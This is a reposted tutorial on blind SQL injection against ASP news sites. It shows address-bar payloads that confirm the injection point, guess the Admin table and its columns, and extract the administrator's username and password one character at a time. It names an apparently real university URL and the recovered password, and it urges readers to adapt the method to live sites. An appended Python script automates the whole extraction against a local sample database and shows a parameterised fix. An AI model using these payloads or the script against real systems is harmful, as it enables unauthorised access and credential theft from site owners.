Learn SQL Injection
Many of the smaller news-site scripts in China are written in ASP and build their SQL by concatenating the raw request parameter straight into the query string (the `"..." & request("id")` pattern), with no validation at all. The following describes how that is attacked.
In the address bar, append to the article URL (the URL used later on this page is article_view.asp?id=2499):
and 1=1
This tests whether the injection point exists. If the page comes back normally, the appended condition was executed as part of the SQL; if the page errors, it was not. The complementary test is `and 1=2`: on a vulnerable page this condition is false, so the article is not found and the page comes back blank or with an error, which confirms that the parameter really controls the query rather than simply being ignored. Next, assume the site's database has a table called Admin.
In the address bar:
and 0<>(select count(*) from Admin)
If the page returns normally, the subquery ran, so a table named Admin exists and has at least one row: the assumption holds. An error means the table does not exist under that name; a blank page means it exists but is empty.
Now find out how many administrator accounts the Admin table holds:
and 1<(select count(*) from Admin)
Nothing is shown on the page, so the count is not greater than 1: there is at most one administrator.
and 1=(select count(*) from Admin)
The page returns normally, so this site has exactly one administrator. Every `1=(select count(*) from Admin where ...)` condition below relies on this: with exactly one row, the subquery returns 1 precisely when that one row satisfies the WHERE clause.
Next, work out the names of the username and password columns in Admin.
and 1=(select count(*) from Admin where len(username)>0)
Error! There is no column called username (referencing a column that does not exist makes the query fail). Keep swapping the name inside the brackets; some common guesses are:
User, users, Member, members, userlist, memberlist, userinfo, admin, Manager, user, yonghu
Once the username column is found (here it is User), guess the password column the same way:
and 1=(select count(*) from Admin where len(password)>0)
The password column exists, because password is by far the most common name for it. If it is not there, try pass; if that fails too, think of other likely names.
We now know the Admin table has three columns:
ID
User (the username)
Password
Next, guess the administrator's username and password themselves, one character at a time. Doing this by hand is tedious, so it is better to find a guessing tool that automates it.
Guess the length first!
and 1=(select count(*) from Admin where len(User)<10)
The page returns normally: the User value is shorter than 10 characters.
and 1=(select count(*) from Admin where len(User)<5)
The page does not return normally: the length is not less than 5, so it lies between 5 and 9. Narrowing it down step by step, we eventually find the length is 6. The following condition confirms it: if the page returns normally, the guess is correct.
and 1=(select count(*) from Admin where len(User)=6)
Now the password length:
and 1=(select count(*) from Admin where len(Password)=10)
The password turns out to be 10 characters. Do not be surprised by that; administrators are more defensive nowadays, and a 20-character password would not be unusual either.
What remains is to split each value up and guess it one character at a time.
and 1=(select count(*) from Admin where left(User,1)='a')
The page returns normally, so the first character is a. Be careful about case: on Access, and on SQL Server with its default collation, string comparison is case-insensitive, so the guess matches whichever case you write and you cannot tell the real case apart this way; on a case-sensitive database a wrong-case guess simply fails to match. If a does not match, keep trying other characters until the page returns normally.
Then guess the second character of the account:
and 1=(select count(*) from Admin where left(User,2)='ad')
Carry on adding one character at a time until you reach the length found earlier, and the account name is out.
The job is not finished yet, so do not rush off: there are still the 10 password characters to go.
and 1=(select count(*) from Admin where left(Password,1)='a')
After countless errors ......
http://xyz.hytc.edu.cn/new2/article_view.asp?id=2499 and 1=(select count(*) from Admin where left(Password,10)='administra')
Result: the password is administra.
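The whole procedure above (the and 1=1 check, counting the Admin rows, finding the column lengths and then the values one character at a time) as an added, runnable example that is not from the original article: a Python/SQLite stand-in for the ASP page that concatenates request("id") into its query, a parameterised version that does not, and a script that drives the tutorial's boolean oracle against both. The database contents, the account name admin1 and the article title are constructed sample data (the id 2499 and the password administra are the page's own); SQLite has no Len() or left(), so length() and substr() stand in for them, and unlike Access it compares text case-sensitively.

```python
import sqlite3
import string


# Constructed stand-in for the news site's database (hypothetical sample data,
# not from the page): one article and an Admin table with a single row.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO article VALUES (2499, 'sample article');
        CREATE TABLE Admin (ID INTEGER PRIMARY KEY, User TEXT, Password TEXT);
        INSERT INTO Admin VALUES (1, 'admin1', 'administra');
    """)
    return db


def vulnerable_view(db, raw_id):
    """The page's flaw: the raw id parameter is concatenated into the SQL
    string, as in ASP's  sql = "... where id=" & request("id").
    Returns the article title (normal page), or None for both "no article
    found" and "database error" - which is all the attacker gets to see."""
    sql = "select title from article where id=" + raw_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def safe_view(db, raw_id):
    """The fix: validate the type, then bind the value as a parameter."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return None
    row = db.execute("select title from article where id=?", (article_id,)).fetchone()
    return row[0] if row else None


def make_oracle(view, db, base_id="2499"):
    """Boolean oracle: does the page come back normally when `cond` is
    appended to the id, exactly as the tutorial does in the address bar?"""
    def holds(cond):
        return view(db, f"{base_id} and {cond}") is not None
    return holds


def is_injectable(holds):
    # 'and 1=1' normal but 'and 1=2' not: the parameter reaches the query.
    return holds("1=1") and not holds("1=2")


def admin_count(holds, table="Admin", limit=64):
    # 'and 0<>(select count(*) ...)', then 'and N<(select count(*) ...)' until it fails.
    # Returns 0 both for an empty table and for a table that does not exist (an
    # SQL error also yields no page), which the tutorial's check cannot tell apart.
    if not holds(f"0<>(select count(*) from {table})"):
        return 0
    n = 1
    while n < limit and holds(f"{n}<(select count(*) from {table})"):
        n += 1
    return n


def column_length(holds, column, table="Admin", upper=64):
    # Binary search on 'len(col)<N' (SQLite: length) instead of the tutorial's
    # manual narrowing. Invariant: lo <= length < hi. Relies on exactly one row.
    lo, hi = 0, upper
    if not holds(f"1=(select count(*) from {table} where length({column})<{hi})"):
        raise ValueError(f"{column} is {upper} characters or longer")
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if holds(f"1=(select count(*) from {table} where length({column})<{mid})"):
            hi = mid
        else:
            lo = mid
    return lo


def extract_column(holds, column, length, table="Admin",
                   alphabet=string.ascii_lowercase + string.digits):
    # 'left(col,k)=<known prefix + next char>' (SQLite: substr(col,1,k)), one
    # position at a time. SQLite compares text case-sensitively, so the alphabet
    # must contain the right case; Access and SQL Server (default collation) do not care.
    known = ""
    for k in range(1, length + 1):
        for ch in alphabet:
            guess = known + ch
            if holds(f"1=(select count(*) from {table} where substr({column},1,{k})='{guess}')"):
                known = guess
                break
        else:
            raise ValueError(f"no character in the alphabet matched position {k}")
    return known


def run_demo(view=vulnerable_view):
    """The full chain of the tutorial, run against the sample database."""
    holds = make_oracle(view, build_db())
    if not is_injectable(holds):
        return {"injectable": False}
    return {
        "injectable": True,
        "admins": admin_count(holds),
        "user": extract_column(holds, "User", column_length(holds, "User")),
        "password": extract_column(holds, "Password", column_length(holds, "Password")),
    }


if __name__ == "__main__":
    print(run_demo(vulnerable_view))  # {'injectable': True, 'admins': 1, 'user': 'admin1', 'password': 'administra'}
    print(run_demo(safe_view))        # {'injectable': False}
```

Against vulnerable_view the script recovers the account and password with a few dozen requests per value; against safe_view the very first probe fails because int() rejects the appended condition, so the oracle never opens. Binding the parameter is what closes the hole; a length check alone would not, since every payload above rides on a perfectly normal-looking id.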
Having read this article, do not just follow it step by step. Things online change constantly, but I am sure your brain is faster than the site's, so read the article and apply it flexibly; that way you will get the result you want.
Article type: reposted. Submitted by: Sha Jia II. Checked by: netdemon